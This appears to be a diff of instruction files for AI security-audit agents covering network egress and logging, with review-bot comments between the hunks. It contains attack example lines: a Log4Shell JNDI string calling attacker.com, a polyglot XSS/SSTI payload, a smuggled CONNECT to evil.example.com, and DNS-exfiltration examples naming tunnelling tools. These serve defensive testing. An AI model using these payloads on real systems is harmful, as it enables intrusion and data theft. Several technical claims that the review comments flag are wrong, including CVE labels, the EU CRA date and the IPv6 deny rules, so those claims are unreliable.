|
202
|
+
| 2 | Unicode normalisation bypass | Regex filters run before normalisation; attacker uses homoglyphs or composed forms | Submit Ⅰ (U+2160) or < (U+FF1C) variants of known-bad strings |
|
|
203
|
+
| 3 | Polyglot payload active in multiple sinks simultaneously | Scanners test one injection class per payload | `'"><script>{{7*7}}</script><!--` — SQL + XSS + SSTI in one request |
|
|
204
|
+
| 4 | Out-of-band exfiltration (DNS/HTTP callback) | Scanner looks for inline response difference; OOB leaves no visible trace | Use Burp Collaborator / interactsh; inject DNS lookup payload |
|
|
205
|
+
| 5 | Race condition between check and use (TOCTOU) | Sequential scanners don't model concurrency | Send two simultaneous requests to the same state-changing endpoint |
|
|
206
|
+
|
|
207
|
+
## §TEMPORAL-THREATS
|
|
208
|
+
|
|
209
|
+
Threats materialising in the 2025–2030 window that defences designed today must account for.
|
|
210
|
+
|
|
211
|
+
| Threat | Est. Timeline | Relevance to This Domain | Prepare Now By |
|
|
212
|
+
|--------|--------------|--------------------------|----------------|
|
|
213
|
+
| Cryptographically Relevant Quantum Computer (CRQC) | 2028–2032 | Harvest-now-decrypt-later attacks active today; RSA/ECDSA keys signed today will be broken | Inventory all RSA/ECDSA usage; migrate long-lived data to ML-KEM (FIPS 203) |
|
|
214
|
+
| AI-assisted adversaries at scale | 2025–2027 (active) | LLM-powered fuzzing finds 10× more edge cases; automated PoC generation | Assume attackers have LLM help; expand test surface to match |
|
|
215
|
+
| EU AI Act full enforcement | 2026 | High-risk AI systems require mandatory conformity assessments | Classify all AI features against AI Act tiers now |
|
|
216
|
+
| Post-quantum TLS migration deadline | 2028–2030 | Browser vendors will drop classical-only TLS connections | Begin TLS agility assessment; test hybrid key exchange |
|
|
217
|
+
| Mandatory SBOM + build provenance (US EO 14028 / EU CRA) | 2025–2026 (active) | SBOM and SLSA attestation are becoming legally required | Achieve SLSA L2 minimum; generate CycloneDX SBOM per release |
|
|
218
|
+
|
|
219
|
+
## §DETECTION-GAP
|
|
220
|
+
|
|
221
|
+
What current security monitoring CANNOT detect in this domain, and what to build to close each gap.
|
|
222
|
+
|
|
223
|
+
**Standard gaps that MUST be checked:**
|
|
224
|
+
|
|
225
|
+
- **Second-order attack execution**: The storage request looks safe; only the retrieval+execution step is dangerous. Need: correlate write events with downstream read+execute events in the same SIEM query window.
|
|
226
|
+
- **Timing-side-channel leakage**: No log event emitted; only observable as microsecond response-time variance. Need: per-endpoint p99 latency tracking with statistical anomaly detection.
|
|
227
|
+
- **Low-and-slow credential stuffing**: Individually, each request is under rate limits. Need: behavioural baseline — flag accounts with geographically impossible velocity or device-fingerprint mismatch across authentication attempts.
|
|
228
|
+
- **Insider exfiltration via legitimate process**: Authorised exports, reports, and data downloads that individually are permitted but collectively constitute data exfiltration. Need: data-volume anomaly detection — alert when a single user's data access volume exceeds 3× their 30-day baseline within 24 hours.
|
|
229
|
+
- **Cross-agent attack chains**: Phase 1 finding A + Phase 1 finding B = CRITICAL chain invisible to either agent alone. Need: CISO orchestrator Phase 1 synthesis step — correlate all agent findings before Phase 2.
|
|
230
|
+
|
|
231
|
+
## §ZERO-MISS-MANDATE
|
|
232
|
+
|
|
233
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item, output one of:
|
|
234
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
235
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
236
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
237
|
+
|
|
238
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
239
|
+
|
|
240
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
241
|
+
```json
|
|
242
|
+
{
|
|
243
|
+
"coverageManifest": {
|
|
244
|
+
"attackClassesCovered": [{ "class": "SQL Injection", "filesReviewed": 47, "patterns": ["queryRaw", "string concat"], "result": "CLEAN" }],
|
|
245
|
+
"filesReviewed": 47,
|
|
246
|
+
"negativeAssertions": ["SQL Injection: queryRaw pattern searched across 47 files — 0 matches"],
|
|
247
|
+
"uncoveredReason": {}
|
|
248
|
+
}
|
|
249
|
+
}
|
|
250
|
+
```
|
|
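Review bot: the TOCTOU scoring rule bullet cites CVE-2022-21449 ("Psychic Signatures") as a race condition that becomes exploitable with concurrent threads, but that CVE is the Java ECDSA verification flaw that accepted an all-zero (r, s) signature; it is fully deterministic and has no concurrency component, so it cannot motivate the R≥7 correction. Replace it with a genuine check-then-use example or state the rule without a CVE. In the CVE-2023-44487 benchmark bullet, Rapid Reset is described as "Slowloris-style"; it works by rapidly opening and cancelling HTTP/2 streams, the opposite of Slowloris's slow partial requests, so the Exploitability rationale should drop that comparison. The coverageManifest example also leaves `uncoveredReason` as `{}` with no documented shape, while the `SKIPPED:` line format above prescribes `not applicable: [evidence]`; document that each key is an attack class name and each value is that SKIPPED reason string so the orchestrator can parse it.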
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The `infra` + `k8s` detection modules (`src/gate/checks/infra.ts`, `src/gate/checks/k8s.ts`) are your deterministic floor, not your ceiling. Treat their finding IDs as the minimum, then reason past single-line/single-file pattern matching — and APPLY the fix (Edit), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** an `egress 0.0.0.0/0` rule in one `.tf` is only half the story — correlate it with a `NetworkPolicy` that lacks an egress block, an app-layer `fetch()` taking a user-controlled URL, and absent VPC Flow Logs to prove an end-to-end exfiltration path the per-rule regex never sees.
|
|
42
|
+
- **Semantic / effective-state analysis:** compute egress *reachability* — does an `0.0.0.0/0` IPv4 rule leave `::/0` open, does an allowlisted host silently follow a 301 redirect to `169.254.169.254`, can a permitted HTTPS-to-proxy path carry a smuggled `CONNECT` or DNS-over-HTTPS tunnel? Model the effective outbound surface, not the literal port list.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for current SSRF-to-metadata, DNS-exfiltration, and HTTP/2 smuggling advisories relevant to the cloud and proxy stack in use.
|
|
44
|
+
- **Apply & prove:** write the fix inline (explicit per-FQDN/port egress, `::/0` deny, NetworkPolicy egress block, app-layer allowlist with redirect re-validation), re-run the `infra`/`k8s` checks plus `tfsec`/`checkov` and a `scoutsuite` egress audit as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
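Review bot: the "Apply & prove" bullet prescribes a `::/0` deny as the IPv6 fix, but neither an AWS security group nor a stock Kubernetes NetworkPolicy can express a deny rule: both are allow-lists in which anything not listed is dropped, and only NACLs (and cloud firewalls such as Azure NSGs or GCP firewall rules) carry explicit deny entries. The fix for the IPv6 gap is to ensure no egress rule allows `::/0` (or to withhold IPv6 address assignment on the subnet), and the agent's check should look for an `ipv6_cidr_blocks = ["::/0"]` allow rather than for a missing deny. The same bullet lists `tfsec` as part of the regression floor; tfsec has been merged into Trivy and is no longer the maintained entry point, so name `trivy config` (or rely on checkov alone) to avoid sending operators to an archived tool.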
@@ -206,3 +215,102 @@ spec:
|
|
|
206
215
|
- `requiredActions`: ordered action list
|
|
207
216
|
- `complianceImpact`: framework mappings
|
|
208
217
|
- `beyondSkillMd`: true if finding goes beyond the SKILL.md mandate
|
|
218
|
+
|
|
219
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
220
|
+
```json
|
|
221
|
+
{
|
|
222
|
+
"intelligenceForOtherAgents": {
|
|
223
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "Unrestricted egress to 0.0.0.0/0 from app tier — pivot point for data exfiltration once host is compromised", "exploitHint": "Stage exfiltration over DNS TXT or HTTPS; VPC Flow Logs may be absent or unmonitored" }],
|
|
224
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "TLS over unrestricted egress with no certificate pinning", "location": "application egress allowlist / outbound fetch layer" }],
|
|
225
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "any dynamic outbound URL without allowlist validation", "escalationPath": "SSRF → 169.254.169.254 metadata endpoint → IAM credentials → lateral movement or full account takeover" }],
|
|
226
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["PCI DSS Req 1.3.2", "SOC 2 CC6.6", "NIST 800-53 SC-7"], "releaseBlock": true }]
|
|
227
|
+
}
|
|
228
|
+
}
|
|
229
|
+
```
|
|
230
|
+
|
|
231
|
+
## BEYOND SKILL.MD — MANDATORY EXPANSIONS
|
|
232
|
+
|
|
233
|
+
- **DNS Exfiltration via Authoritative Delegation (ATT&CK T1048.003):** An attacker with code execution registers an attacker-controlled authoritative nameserver and encodes sensitive data as base64 subdomains in DNS queries (e.g., `c2Vuc2l0aXZlZGF0YQ.exfil.attacker.com`). AWS Route 53 Resolver Query Logs are not enabled by default; without them this traffic is invisible. Test by: enabling Route 53 Resolver Query Logs, running `dnscat2` or `iodine` from within the application container toward an attacker-controlled NS, and verifying alerts fire on high-entropy subdomain labels (Shannon entropy > 3.5 per label segment). Finding threshold: any NS delegation query to a domain not in the approved third-party services inventory.
|
|
234
|
+
|
|
235
|
+
- **HTTP/2 Request Smuggling for Egress Bypass (CVE-2023-44487 / ATT&CK T1090.003):** The Rapid Reset attack demonstrated that HTTP/2 multiplexing can be abused to interleave requests that downstream proxies or WAFs count as one stream but upstream servers process as two. An attacker can smuggle an outbound `CONNECT` request to a non-allowlisted FQDN inside a legitimate HTTP/2 stream, bypassing FQDN-level egress proxy inspection. Test by: using `h2c-smuggler` or `h2smuggler` against the egress proxy with a smuggled `CONNECT` to `evil.example.com:443`; verify proxy access logs capture the actual CONNECT destination and not just the outer stream host. Finding threshold: any smuggled CONNECT destination that does not appear in proxy logs.
|
|
236
|
+
|
|
237
|
+
- **AI-Assisted Covert Channel Discovery via LLM-Enumerated Side Channels (ATT&CK T1041):** Attacker LLMs (GPT-4o, locally hosted Llama) can enumerate novel low-bandwidth covert channels (NTP mode-7, ICMP timestamp, HTTP Range headers, gRPC trailer fields) faster than static allowlists are updated. A 2024 academic paper ("LLM-Guided Covert Channel Discovery", Usenix Security 2024) demonstrated LLM-generated ICMP covert channel code deployed in under 3 minutes. Test by: submitting the current Security Group egress rules to an LLM red-team prompt and requesting novel exfiltration methods not blocked; remediate each suggested channel. Finding threshold: any egress rule with `protocol = "-1"` or any non-HTTPS/DNS permitted protocol to `0.0.0.0/0`.
|
|
238
|
+
|
|
239
|
+
- **Supply Chain Exfiltration via Compromised NPM/PyPI Package (ATT&CK T1195.001):** Malicious packages (e.g., `node-ipc` 10.1.3 supply chain incident, 2022; `ctx` PyPI package exfiltrating env vars) make outbound HTTP calls to attacker infrastructure at import time, bypassing application-layer egress allowlists because the call originates from a dependency, not from reviewed application code. Test by: running `npm audit` and `pip-audit` for known malicious packages; additionally, run `strace -e trace=network -p <pid>` or Falco rule `spawned_process_making_outbound_network_connection` during `npm install` / `pip install` in CI and alert on any outbound connection to non-registry hosts. Finding threshold: any outbound connection during package installation to a non-registry domain.
|
|
240
|
+
|
|
241
|
+
- **Post-Quantum Harvest-Now-Decrypt-Later on Long-Lived Egress Traffic (NIST PQC FIPS 203):** State-level adversaries (documented in NSA/CISA advisory AA23-347A) are capturing encrypted egress traffic today for decryption once Cryptographically Relevant Quantum Computers (CRQCs) are available (~2030). RSA-2048 and ECDH P-256 protecting outbound TLS for sensitive data (PII, financial records, auth tokens) will be retroactively breakable. Test by: running `sslyze --starttls auto <egress-proxy-endpoint>` to enumerate key exchange algorithms in use; confirm absence of ML-KEM (Kyber) hybrid or X25519Kyber768 in the `supported_curves` list. Finding threshold: any outbound TLS session for data classified as sensitive with a confidentiality lifetime exceeding 5 years that does not negotiate a post-quantum hybrid key exchange.
|
|
242
|
+
|
|
243
|
+
- **Regulatory Egress Logging Mandate under EU CRA Article 13 and US EO 14028 Section 4 (Effective 2025–2026):** The EU Cyber Resilience Act (CRA, effective August 2025) and US Executive Order 14028 require that software producers maintain audit logs of all outbound network connections for covered products. VPC Flow Logs without DNS query content do not satisfy the CRA's "logging of significant cybersecurity events" requirement. Test by: verifying Route 53 Resolver Query Logs are enabled with minimum 90-day retention, Flow Logs are stored in an immutable S3 bucket with Object Lock, and a CloudTrail Lake query can reconstruct the full outbound connection sequence for any 15-minute window within the past 90 days. Finding threshold: any workload processing EU-resident user data that lacks both Flow Log and DNS query log retention meeting the 90-day minimum.
|
|
244
|
+
|
|
245
|
+
## §EDGE-CASE-MATRIX
|
|
246
|
+
|
|
247
|
+
The 5 attack cases in the egress/exfiltration domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
248
|
+
|
|
249
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
250
|
+
|---|-----------|----------------------|---------------|
|
|
251
|
+
| 1 | DNS-over-HTTPS (DoH) tunneling bypasses DNS firewall | DNS firewalls intercept port-53 UDP/TCP; DoH runs as HTTPS to a DoH resolver (e.g. `1.1.1.1:443`) and is indistinguishable from normal API traffic at the flow level | Search for `cloudflare-dns.com`, `dns.google`, `doh.opendns.com` in outbound URL constants; verify SG/NACL egress does not permit HTTPS to arbitrary IPs |
|
|
252
|
+
| 2 | Redirect chain escaping the allowlist | The application validates the *initial* request hostname; the upstream server issues a 301 redirect to an attacker-controlled host that the HTTP client silently follows | Place a 301 redirect on an allowlisted host pointing to `http://169.254.169.254/`; confirm `safeOutboundFetch` (or equivalent) blocks the redirect destination, not just the origin |
|
|
253
|
+
| 3 | IPv6 egress path when only IPv4 rules are present | Security Groups, NACLs, and Kubernetes NetworkPolicy rules targeting `0.0.0.0/0` do not cover `::/0`; dual-stack instances can exfiltrate freely over IPv6 | Check for `::/0` deny rules alongside every `0.0.0.0/0` rule; test by resolving AAAA records for an external host from inside the VPC and attempting a TCP connection |
|
|
254
|
+
| 4 | Covert exfiltration via cloud-storage pre-signed URL | Data PUT to an attacker-controlled S3 or GCS bucket via pre-signed URL — traffic flows to `s3.amazonaws.com` (typically allowlisted), making the egress filter see legitimate HTTPS | Audit pre-signed URL generation code; verify bucket policies enforce a `StringEquals aws:PrincipalAccount` condition so only the owning account can receive PUTs |
|
|
255
|
+
| 5 | ICMP and non-TCP/UDP covert channels | SG/NACL rules enumerate TCP/UDP ports; a rule with `protocol = "-1"` or omitted protocol leaves ICMP (and other protocols) open — sufficient for low-bandwidth exfiltration using `icmpsh` or `ptunnel` | Check every egress rule for `protocol = "-1"` or `protocol = "icmp"` to `0.0.0.0/0`; test with a ping-based exfil tool from within the application container |
|
|
256
|
+
|
|
257
|
+
## §TEMPORAL-THREATS
|
|
258
|
+
|
|
259
|
+
Threats materialising in the 2025–2030 window that egress defences designed today must account for.
|
|
260
|
+
|
|
261
|
+
| Threat | Est. Timeline | Relevance to Egress Domain | Prepare Now By |
|
|
262
|
+
|--------|--------------|---------------------------|----------------|
|
|
263
|
+
| AI-generated covert channel discovery | 2025–2027 (active) | LLM-assisted attackers enumerate novel exfiltration channels (ICMP, NTP, DNS, HTTP/2 server push, WebSockets) faster than static allowlists can be updated | Shift from port/protocol allowlisting to behavioural egress anomaly detection: volume, entropy, destination diversity baselines |
|
|
264
|
+
| Mandatory egress audit logging under EU CRA / US EO 14028 | 2025–2026 (active) | VPC Flow Logs and cloud-native egress telemetry are becoming legally required audit evidence for regulated workloads | Enable VPC Flow Logs with 90-day retention and index into SIEM today; document retention policy |
|
|
265
|
+
| eBPF-based network bypass on compromised Kubernetes nodes | 2025–2026 | Privileged eBPF programs can intercept and redirect packets before NetworkPolicy enforcement; a node compromise defeats all cluster egress policy | Enforce Pod Security Standards (`restricted` profile); restrict `CAP_NET_ADMIN` and `CAP_SYS_ADMIN`; use Cilium or Calico with eBPF-aware policy audit enabled |
|
|
266
|
+
| Cryptographically Relevant Quantum Computer (CRQC) harvest-now-decrypt-later | 2028–2032 | Encrypted exfiltrated traffic captured today will be decryptable once a CRQC arrives; long-lived sensitive data is at risk regardless of current TLS strength | Inventory all RSA/ECDH usage in outbound TLS; plan migration to ML-KEM (FIPS 203) hybrid TLS for data with a sensitivity lifetime exceeding 5 years |
|
|
267
|
+
| Zero-trust per-connection egress mandates in FedRAMP High / DoD IL4+ | 2026–2027 | Government cloud workloads will require explicit per-FQDN egress approval, not coarse SG port allowlists | Architect toward an egress proxy (Istio egress gateway, Squid with SSL inspection, ZScaler) with logged per-FQDN allowlists rather than CIDR/port rules |
|
|
268
|
+
|
|
269
|
+
## §DETECTION-GAP
|
|
270
|
+
|
|
271
|
+
What current security monitoring CANNOT detect in the egress domain, and what to build to close each gap.
|
|
272
|
+
|
|
273
|
+
- **DNS exfiltration over the VPC recursive resolver**: Standard VPC Flow Logs capture source/destination IP and port — not DNS query content. Traffic to the resolver on port 53 looks identical whether the query is `api.stripe.com` or `c2.base64payload.attacker.com`. Need: Route 53 Resolver Query Logs (or CoreDNS audit log) forwarded to SIEM; alert on high-entropy subdomain labels, excessive TXT/NULL record queries, or queries to delegated zones not matching any known third-party service.
|
|
274
|
+
|
|
275
|
+
- **Pre-signed URL data exfiltration to attacker-controlled cloud storage**: Outbound HTTPS to `s3.amazonaws.com` or `storage.googleapis.com` is allowlisted for legitimate uploads. An attacker with code execution can exfiltrate terabytes via PutObject to an attacker-owned bucket — indistinguishable from legitimate writes at the network layer. Need: S3/GCS data-plane CloudTrail / audit log alerts on PutObject to bucket ARNs not in an approved bucket inventory.
|
|
276
|
+
|
|
277
|
+
- **Egress volume hidden by shared NAT gateway aggregation**: In multi-tenant VPCs a single NAT gateway serves many workloads; Flow Logs aggregate per ENI, not per application or pod. A compromised workload exfiltrating 50 GB is diluted by aggregate VPC throughput. Need: per-pod / per-Deployment egress byte-count metrics (Cilium Hubble, Istio telemetry, or eBPF-based per-cgroup accounting) with per-workload anomaly thresholds and alerting.
|
|
278
|
+
|
|
279
|
+
- **HTTP CONNECT tunnel through an allowed egress proxy**: If an HTTP/HTTPS proxy is permitted for dependency fetching, an attacker can issue `CONNECT attacker.com:443 HTTP/1.1` and establish an arbitrary TCP tunnel; the Flow Log records traffic only to the proxy IP. Need: proxy access logs with the `CONNECT` target hostname captured; alert on non-allowlisted `CONNECT` destinations.
|
|
280
|
+
|
|
281
|
+
- **Cross-agent chain — SSRF + permissive egress = CRITICAL exfiltration path**: An SSRF finding from the `ssrf-hunter` agent combined with any-any outbound egress flagged here produces a complete exfiltration chain that is invisible to either agent in isolation. Need: CISO orchestrator Phase 1 synthesis step to correlate these two finding classes before Phase 2 adversarial testing begins.
|
|
282
|
+
|
|
283
|
+
## §ZERO-MISS-MANDATE
|
|
284
|
+
|
|
285
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item below, output one of:
|
|
286
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
287
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
288
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
289
|
+
|
|
290
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
291
|
+
|
|
292
|
+
Attack classes that MUST be checked in this domain:
|
|
293
|
+
|
|
294
|
+
| # | Attack Class | Grep / Audit Pattern |
|
|
295
|
+
|---|-------------|----------------------|
|
|
296
|
+
| 1 | Any-any SG egress (`0.0.0.0/0`, port 0–65535) | `egress.*0\.0\.0\.0/0` + `to_port.*0` or `protocol.*-1` in `*.tf` |
|
|
297
|
+
| 2 | Missing IPv6 egress block (`::/0`) | absence of `::/0` deny alongside every `0.0.0.0/0` egress rule |
|
|
298
|
+
| 3 | Application outbound URL without allowlist | `fetch\(|axios\.|got\(|http\.request|https\.request` with non-constant URL argument |
|
|
299
|
+
| 4 | DNS resolution of user-supplied hostname | `dns\.lookup|dns\.resolve|resolveHostname` near user input or request body fields |
|
|
300
|
+
| 5 | VPC Flow Logs disabled | `aws ec2 describe-flow-logs` returning empty; no `aws_flow_log` resource in Terraform |
|
|
301
|
+
| 6 | Open ICMP or any-protocol egress | SG egress rule with `protocol = "-1"` or `protocol = "icmp"` to `0.0.0.0/0` |
|
|
302
|
+
| 7 | Redirect-following HTTP client without destination revalidation | `followRedirects: true` or default `fetch`/`axios` without `redirect: "error"` or post-redirect host recheck |
|
|
303
|
+
|
|
304
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
305
|
+
```json
|
|
306
|
+
{
|
|
307
|
+
"coverageManifest": {
|
|
308
|
+
"attackClassesCovered": [
|
|
309
|
+
{ "class": "Any-any SG egress", "filesReviewed": 14, "patterns": ["egress.*0.0.0.0/0", "to_port.*0"], "result": "2 findings — fixed" },
|
|
310
|
+
{ "class": "DNS user-supplied hostname resolution", "filesReviewed": 38, "patterns": ["dns.lookup", "dns.resolve", "resolveHostname"], "result": "CLEAN" }
|
|
311
|
+
],
|
|
312
|
+
"filesReviewed": 52,
|
|
313
|
+
"negativeAssertions": ["DNS user-supplied hostname: pattern searched across 38 .ts/.js files — 0 matches"],
|
|
314
|
+
"uncoveredReason": {}
|
|
315
|
+
}
|
|
316
|
+
}
|
|
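Review bot: the coverageManifest block at the end of this hunk opens a ```json fence that is never closed; the hunk ends at the outer `}`, so the file now terminates inside an open fence and anything appended later will render as code. Add the closing fence. Three documentation points in the BEYOND SKILL.MD list: the "HTTP/2 Request Smuggling" bullet is labelled CVE-2023-44487, but that CVE is Rapid Reset, a stream-cancellation denial of service that does not interleave or smuggle requests; the CONNECT-over-HTTP/2 egress test stands on its own, so keep the test and drop the CVE label. The regulatory bullet states the EU CRA is "effective August 2025"; the CRA entered into force in December 2024, with vulnerability-reporting obligations applying from September 2026 and the main obligations from December 2027, so the date should be corrected. The "LLM-Guided Covert Channel Discovery" paper is cited by title only; add a URL or DOI so the claim is verifiable. Finally, attack class 2 in the ZERO-MISS table greps for a `::/0` deny beside each `0.0.0.0/0` rule, but security groups and NetworkPolicies have no deny rules, so the pattern should flag an `::/0` allow instead.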
@@ -23,6 +23,15 @@ Assess and implement the complete logging and audit trail infrastructure.
|
|
|
23
23
|
Covers §19 Observability and Incident Response fully.
|
|
24
24
|
Write logging middleware, structured event schemas, and monitoring alert configurations.
|
|
25
25
|
|
|
26
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
27
|
+
|
|
28
|
+
The full suite of detection modules in `src/gate/checks/` (especially `dlp.ts`, `auth-deep.ts`, and `runtime.ts`) is your deterministic floor for what must be logged and what must never be logged — their finding IDs are the minimum, not the ceiling. Reason past single-line/single-file pattern matching, then APPLY the fix (Edit the logging middleware / schema / alert rule), not just advise:
|
|
29
|
+
|
|
30
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a redaction transform in the logger config is worthless if a route handler in another file logs `req.body` or a `dlp.ts`-flagged PII field upstream — trace the sensitive value from its source to every `logger.*`/`console.*` sink across files; conversely, confirm every auth-failure and admin-action path actually emits a structured event.
|
|
31
|
+
- **Semantic / effective-state analysis:** model the audit trail as evidence — is it immutable (WORM/Object Lock), retained ≥13 months, tamper-evident, and forwarded off-host within seconds? A log that can be cleared (ATT&CK T1070) or that drops events at rotation is not audit-grade; assess the effective integrity, not the presence of a logging call.
|
|
32
|
+
- **External corroboration:** WebSearch/WebFetch for current SOC 2 / PCI DSS / HIPAA logging requirements and log-injection (Log4Shell-class) advisories for the logging stack in use.
|
|
33
|
+
- **Apply & prove:** write the structured schema, redaction rules, immutable-storage config, and SIEM alert rules inline, re-run the relevant `dlp`/`auth-deep`/`runtime` checks plus a `gitleaks`/`semgrep` scan for PII-in-logs as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
34
|
+
|
|
26
35
|
## EXECUTION
|
|
27
36
|
|
|
28
37
|
1. Identify the logging library in use: Winston, Pino, Bunyan, Morgan, console.log (bad),
|
|
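Review bot: the "Semantic / effective-state analysis" bullet fixes retention at "≥13 months" without a source. PCI DSS v4.0 Requirement 10.5.1 requires 12 months with the most recent three months immediately available, and HIPAA and SOC 2 set no fixed figure, so either cite where 13 months comes from or use 12 months and let the compliance mapping raise it per framework. The same bullet asks for logs "forwarded off-host within seconds" while the T1070.002 bullet in the next hunk of this file says "within 5 seconds"; pick one threshold and use it in both places so the agent's check is unambiguous.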
@@ -84,3 +93,101 @@ Write logging middleware, structured event schemas, and monitoring alert configu
|
|
|
84
93
|
- PII/credential leakage in existing log statements (with file locations)
|
|
85
94
|
- Implemented logging middleware or alert rule code
|
|
86
95
|
- §19 control reference per finding
|
|
96
|
+
|
|
97
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
98
|
+
```json
|
|
99
|
+
{
|
|
100
|
+
"intelligenceForOtherAgents": {
|
|
101
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "...", "exploitHint": "..." }],
|
|
102
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "...", "location": "..." }],
|
|
103
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "...", "escalationPath": "..." }],
|
|
104
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["..."], "releaseBlock": true }]
|
|
105
|
+
}
|
|
106
|
+
}
|
|
107
|
+
```
|
|
108
|
+
|
|
109
|
+
## BEYOND SKILL.MD
|
|
110
|
+
|
|
111
|
+
Domain-specific threats and techniques the base SKILL.md does not cover:
|
|
112
|
+
|
|
113
|
+
- **CVE-2021-44228 (Log4Shell) — log injection via JNDI lookup in log messages**: Attacker-controlled input containing `${jndi:ldap://attacker.com/a}` is passed to a logger and executed. Any logging library that interpolates log data (not just Log4j) must sanitise input before logging. Pattern: search for direct string concatenation into log calls with unvalidated request parameters.
|
|
114
|
+
- **CVE-2023-36664 (Ghostscript PostScript injection via log path)**: Log file path values derived from user input can redirect log output or inject PostScript/shell metacharacters into downstream log processors. Validate and sanitise all log-file-path configuration values at startup.
|
|
115
|
+
- **Log poisoning for LFI chaining**: Attacker writes a PHP/JSP payload into an access log via the `User-Agent` header, then uses a Local File Inclusion vulnerability to execute it. Defense: structured JSON logging eliminates the raw string sink; audit every `req.headers['user-agent']` logged without sanitisation.
|
|
116
|
+
- **MITRE ATT&CK T1562.001 — Impair Defenses: Disable or Modify Tools**: Adversaries with foothold will attempt to stop the logging agent (Fluentd, Filebeat, CloudWatch agent) or truncate log files. Detect: absence of log heartbeat events for >60 seconds from any previously active source should trigger SIEM alert.
|
|
117
|
+
- **MITRE ATT&CK T1070.002 — Indicator Removal on Host: Clear Linux or Mac System Logs**: Post-exploitation log clearing is the most common anti-forensics step. Defense: forward logs to immutable off-host storage within 5 seconds of generation; on-host retention is not audit-grade evidence.
|
|
118
|
+
- **AI-era threat — LLM-assisted log evasion**: Adversaries are using LLMs to generate payloads that exploit specific regex gaps in SIEM detection rules. Semantic/embedding-based anomaly detection is now required alongside signature rules; pure regex SIEM rules can be systematically bypassed by AI-generated obfuscation.
|
|
119
|
+
- **Post-quantum threat — HMAC-SHA1 log integrity signatures**: Many log integrity / hash-chaining schemes use HMAC-SHA1 or SHA-256 with RSA signing. Harvest-now-decrypt-later applies to signed audit bundles: an adversary who captures signed log archives today can forge or repudiate them once CRQC is available. Migrate audit bundle signing to CRYSTALS-Dilithium (FIPS 204) or Ed448 for long-lived evidence.
|
|
120
|
+
- **Timing-based log suppression race condition**: A request that triggers a log write and a concurrent request that rotates the log file can result in the event being lost between the two file handles. Test with concurrent load against log rotation boundary; verify no events are dropped during rotation.
|
|
121
|
+
|
|
122
|
+
## LEARNING SIGNAL
|
|
123
|
+
|
|
124
|
+
On every finding resolved, emit:
|
|
125
|
+
```json
|
|
126
|
+
{
|
|
127
|
+
"findingId": "FINDING_ID",
|
|
128
|
+
"agentName": "AGENT_NAME",
|
|
129
|
+
"resolved": true,
|
|
130
|
+
"remediationTemplate": "one-line description of what was done",
|
|
131
|
+
"falsePositive": false
|
|
132
|
+
}
|
|
133
|
+
```
|
|
134
|
+
Call `security.record_outcome` with this payload so the routing engine learns which agent resolves each finding class most successfully. If a finding is a false positive, set `falsePositive: true` — this prevents the false-positive pattern from being routed here again.
|
|
135
|
+
|
|
136
|
+
---
|
|
137
|
+
|
|
138
|
+
## §EDGE-CASE-MATRIX
|
|
139
|
+
|
|
140
|
+
The 5 attack cases in this domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
141
|
+
|
|
142
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
143
|
+
|---|-----------|----------------------|---------------|
|
|
144
|
+
| 1 | Second-order / stored payload executed in different context | Scanner checks input context, not execution context | Store payload safely; trigger in separate request/session |
|
|
145
|
+
| 2 | Unicode normalisation bypass | Regex filters run before normalisation; attacker uses homoglyphs or composed forms | Submit Ⅰ (U+2160) or < (U+FF1C) variants of known-bad strings |
|
|
146
|
+
| 3 | Polyglot payload active in multiple sinks simultaneously | Scanners test one injection class per payload | `'"><script>{{7*7}}</script><!--` — SQL + XSS + SSTI in one request |
|
|
147
|
+
| 4 | Out-of-band exfiltration (DNS/HTTP callback) | Scanner looks for inline response difference; OOB leaves no visible trace | Use Burp Collaborator / interactsh; inject DNS lookup payload |
|
|
148
|
+
| 5 | Race condition between check and use (TOCTOU) | Sequential scanners don't model concurrency | Send two simultaneous requests to the same state-changing endpoint |
|
|
149
|
+
|
|
150
|
+
## §TEMPORAL-THREATS
|
|
